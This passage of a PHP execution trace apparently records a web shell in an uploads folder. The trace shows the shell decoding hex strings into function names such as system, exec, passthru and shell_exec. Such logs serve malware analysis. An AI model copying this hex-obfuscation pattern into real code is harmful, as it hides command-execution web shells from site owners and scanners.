3	382	0	0.015211	720512	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	382	1	0.015223	720560
3	382	R			97
3	383	0	0.015236	720480	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	383	1	0.015247	720520
3	383	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	384	0	0.015277	720512	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	384	1	0.015288	720560
3	384	R			116
3	385	0	0.015300	720480	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	385	1	0.015311	720520
3	385	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	386	0	0.015341	720512	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	386	1	0.015352	720560
3	386	R			101
3	387	0	0.015364	720480	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	387	1	0.015375	720520
3	387	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	379	1	0.015405	720480
2	379	R			'date'
1		A						/var/www/html/uploads/lCT.php	7	$func[19] = 'date'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	388	0	0.015439	720480	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c656d74696d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	389	0	0.015480	720512	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	389	1	0.015491	720560
3	389	R			102
3	390	0	0.015503	720480	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	390	1	0.015515	720520
3	390	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	391	0	0.015545	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	391	1	0.015556	720592
3	391	R			105
3	392	0	0.015568	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	392	1	0.015580	720552
3	392	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	393	0	0.015610	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	393	1	0.015621	720592
3	393	R			108
3	394	0	0.015634	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	394	1	0.015644	720552
3	394	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	395	0	0.015675	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	395	1	0.015686	720592
3	395	R			101
3	396	0	0.015698	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	396	1	0.015713	720552
3	396	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	397	0	0.015743	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	397	1	0.015754	720592
3	397	R			109
3	398	0	0.015766	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	398	1	0.015778	720552
3	398	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	399	0	0.015808	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	399	1	0.015819	720592
3	399	R			116
3	400	0	0.015831	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	400	1	0.015842	720552
3	400	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	401	0	0.015873	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	401	1	0.015884	720592
3	401	R			105
3	402	0	0.015896	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	402	1	0.015908	720552
3	402	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	403	0	0.015938	720544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	403	1	0.015949	720592
3	403	R			109
3	404	0	0.015961	720512	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	404	1	0.015972	720552
3	404	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	405	0	0.016002	720552	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	405	1	0.016014	720600
3	405	R			101
3	406	0	0.016026	720520	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	406	1	0.016037	720560
3	406	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	388	1	0.016068	720520
2	388	R			'filemtime'
1		A						/var/www/html/uploads/lCT.php	7	$func[20] = 'filemtime'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	407	0	0.016102	720520	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7363616e646972'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	408	0	0.016142	720552	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	408	1	0.016153	720600
3	408	R			115
3	409	0	0.016166	720520	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	409	1	0.016178	720560
3	409	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	410	0	0.016208	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	410	1	0.016220	720632
3	410	R			99
3	411	0	0.016232	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	411	1	0.016244	720592
3	411	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	412	0	0.016274	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	412	1	0.016285	720632
3	412	R			97
3	413	0	0.016297	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	413	1	0.016308	720592
3	413	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	414	0	0.016339	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	414	1	0.016350	720632
3	414	R			110
3	415	0	0.016362	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	415	1	0.016374	720592
3	415	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	416	0	0.016404	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	416	1	0.016415	720632
3	416	R			100
3	417	0	0.016427	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	417	1	0.016443	720592
3	417	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	418	0	0.016473	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	418	1	0.016484	720632
3	418	R			105
3	419	0	0.016497	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	419	1	0.016507	720592
3	419	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	420	0	0.016537	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	420	1	0.016548	720632
3	420	R			114
3	421	0	0.016561	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	421	1	0.016572	720592
3	421	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	407	1	0.016602	720552
2	407	R			'scandir'
1		A						/var/www/html/uploads/lCT.php	7	$func[21] = 'scandir'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	422	0	0.016636	720552	dehex	1		/var/www/html/uploads/lCT.php	7	1	'73797374656d'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	423	0	0.016677	720584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	423	1	0.016688	720632
3	423	R			115
3	424	0	0.016700	720552	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	424	1	0.016712	720592
3	424	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	425	0	0.016743	720616	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	425	1	0.016754	720664
3	425	R			121
3	426	0	0.016766	720584	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	426	1	0.016778	720624
3	426	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	427	0	0.016808	720616	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	427	1	0.016819	720664
3	427	R			115
3	428	0	0.016832	720584	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	428	1	0.016843	720624
3	428	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	429	0	0.016873	720616	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	429	1	0.016884	720664
3	429	R			116
3	430	0	0.016896	720584	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	430	1	0.016907	720624
3	430	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	431	0	0.016938	720616	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	431	1	0.016949	720664
3	431	R			101
3	432	0	0.016961	720584	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	432	1	0.016973	720624
3	432	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	433	0	0.017003	720616	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	433	1	0.017015	720664
3	433	R			109
3	434	0	0.017027	720584	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	434	1	0.017038	720624
3	434	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	422	1	0.017068	720584
2	422	R			'system'
1		A						/var/www/html/uploads/lCT.php	7	$func[22] = 'system'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	435	0	0.017102	720584	dehex	1		/var/www/html/uploads/lCT.php	7	1	'65786563'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	436	0	0.017142	720616	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	436	1	0.017169	720664
3	436	R			101
3	437	0	0.017182	720584	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	437	1	0.017197	720624
3	437	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	438	0	0.017228	720648	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	438	1	0.017239	720696
3	438	R			120
3	439	0	0.017252	720616	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	439	1	0.017264	720656
3	439	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	440	0	0.017294	720648	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	440	1	0.017306	720696
3	440	R			101
3	441	0	0.017318	720616	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	441	1	0.017330	720656
3	441	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	442	0	0.017360	720648	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	442	1	0.017372	720696
3	442	R			99
3	443	0	0.017384	720616	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	443	1	0.017395	720656
3	443	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	435	1	0.017425	720616
2	435	R			'exec'
1		A						/var/www/html/uploads/lCT.php	7	$func[23] = 'exec'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	444	0	0.017459	720616	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7061737374687275'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	445	0	0.017499	720648	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	445	1	0.017511	720696
3	445	R			112
3	446	0	0.017523	720616	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	446	1	0.017534	720656
3	446	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	447	0	0.017565	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	447	1	0.017576	720728
3	447	R			97
3	448	0	0.017588	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	448	1	0.017600	720688
3	448	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	449	0	0.017630	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	449	1	0.017641	720728
3	449	R			115
3	450	0	0.017654	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	450	1	0.017665	720688
3	450	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	451	0	0.017695	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	451	1	0.017707	720728
3	451	R			115
3	452	0	0.017719	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	452	1	0.017731	720688
3	452	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	453	0	0.017761	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	453	1	0.017772	720728
3	453	R			116
3	454	0	0.017785	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	454	1	0.017796	720688
3	454	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	455	0	0.017826	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	455	1	0.017838	720728
3	455	R			104
3	456	0	0.017850	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	456	1	0.017862	720688
3	456	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	457	0	0.017892	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	457	1	0.017903	720728
3	457	R			114
3	458	0	0.017915	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	458	1	0.017930	720688
3	458	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	459	0	0.017961	720680	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	459	1	0.017972	720728
3	459	R			117
3	460	0	0.017984	720648	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	460	1	0.017995	720688
3	460	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	444	1	0.018025	720656
2	444	R			'passthru'
1		A						/var/www/html/uploads/lCT.php	7	$func[24] = 'passthru'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	461	0	0.018059	720656	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7368656c6c5f65786563'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 19
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	462	0	0.018099	720688	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	462	1	0.018110	720736
3	462	R			115
3	463	0	0.018123	720656	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	463	1	0.018134	720696
3	463	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	464	0	0.018165	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	464	1	0.018176	720768
3	464	R			104
3	465	0	0.018189	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	465	1	0.018200	720728
3	465	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	466	0	0.018230	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	466	1	0.018242	720768
3	466	R			101
3	467	0	0.018254	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	467	1	0.018265	720728
3	467	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	468	0	0.018295	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	468	1	0.018307	720768
3	468	R			108
3	469	0	0.018319	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	469	1	0.018331	720728
3	469	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	470	0	0.018361	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	470	1	0.018372	720768
3	470	R			108
3	471	0	0.018389	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	471	1	0.018400	720728
3	471	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	472	0	0.018430	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	472	1	0.018441	720768
3	472	R			95
3	473	0	0.018454	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	473	1	0.018465	720728
3	473	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	474	0	0.018495	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	474	1	0.018506	720768
3	474	R			101
3	475	0	0.018519	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	475	1	0.018530	720728
3	475	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	476	0	0.018560	720720	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	476	1	0.018571	720768
3	476	R			120
3	477	0	0.018584	720688	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	477	1	0.018596	720728
3	477	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	478	0	0.018627	720728	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	478	1	0.018638	720776
3	478	R			101
3	479	0	0.018650	720696	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	479	1	0.018664	720736
3	479	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	480	0	0.018695	720728	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	480	1	0.018706	720776
3	480	R			99
3	481	0	0.018718	720696	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	481	1	0.018729	720736
3	481	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	461	1	0.018759	720696
2	461	R			'shell_exec'
1		A						/var/www/html/uploads/lCT.php	7	$func[25] = 'shell_exec'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	482	0	0.018794	720696	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6f625f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 29
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	483	0	0.018836	720728	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	483	1	0.018847	720776
3	483	R			111
3	484	0	0.018860	720696	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	484	1	0.018871	720736
3	484	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	485	0	0.018902	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	485	1	0.018913	720808
3	485	R			98
3	486	0	0.018925	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	486	1	0.018936	720768
3	486	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	487	0	0.018966	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	487	1	0.018977	720808
3	487	R			95
3	488	0	0.018990	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	488	1	0.019000	720768
3	488	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	489	0	0.019031	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	489	1	0.019042	720808
3	489	R			103
3	490	0	0.019055	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	490	1	0.019066	720768
3	490	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	491	0	0.019096	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	491	1	0.019107	720808
3	491	R			101
3	492	0	0.019120	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	492	1	0.019131	720768
3	492	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	493	0	0.019161	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	493	1	0.019172	720808
3	493	R			116
3	494	0	0.019184	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	494	1	0.019196	720768
3	494	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	495	0	0.019226	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	495	1	0.019237	720808
3	495	R			95
3	496	0	0.019249	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	496	1	0.019260	720768
3	496	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	497	0	0.019291	720760	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	497	1	0.019301	720808
3	497	R			99
3	498	0	0.019314	720728	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	498	1	0.019324	720768
3	498	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	499	0	0.019354	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	499	1	0.019365	720816
3	499	R			111
3	500	0	0.019378	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	500	1	0.019392	720776
3	500	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	501	0	0.019422	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	501	1	0.019434	720816
3	501	R			110
3	502	0	0.019446	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	502	1	0.019457	720776
3	502	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	503	0	0.019487	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	503	1	0.019498	720816
3	503	R			116
3	504	0	0.019511	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	504	1	0.019522	720776
3	504	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	505	0	0.019552	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	505	1	0.019563	720816
3	505	R			101
3	506	0	0.019575	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	506	1	0.019586	720776
3	506	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	507	0	0.019616	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	507	1	0.019627	720816
3	507	R			110
3	508	0	0.019639	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	508	1	0.019651	720776
3	508	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	509	0	0.019680	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	509	1	0.019691	720816
3	509	R			116
3	510	0	0.019704	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	510	1	0.019715	720776
3	510	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	511	0	0.019745	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	511	1	0.019756	720816
3	511	R			115
3	512	0	0.019769	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	512	1	0.019779	720776
3	512	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	482	1	0.019809	720736
2	482	R			'ob_get_contents'
1		A						/var/www/html/uploads/lCT.php	7	$func[26] = 'ob_get_contents'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	513	0	0.019844	720736	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6f625f656e645f636c65616e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 23
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	514	0	0.019885	720768	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	514	1	0.019896	720816
3	514	R			111
3	515	0	0.019909	720736	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	515	1	0.019920	720776
3	515	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	516	0	0.019951	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	516	1	0.019962	720848
3	516	R			98
3	517	0	0.019975	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	517	1	0.019985	720808
3	517	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	518	0	0.020015	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	518	1	0.020027	720848
3	518	R			95
3	519	0	0.020040	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	519	1	0.020051	720808
3	519	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	520	0	0.020082	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	520	1	0.020093	720848
3	520	R			101
3	521	0	0.020106	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	521	1	0.020120	720808
3	521	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	522	0	0.020150	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	522	1	0.020162	720848
3	522	R			110
3	523	0	0.020175	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	523	1	0.020186	720808
3	523	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	524	0	0.020216	720800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	524	1	0.020228	720848
3	524	R			100
3	525	0	0.020240	720768	chr	0		/var/www/html/uploads/lCT.php	204	1	100
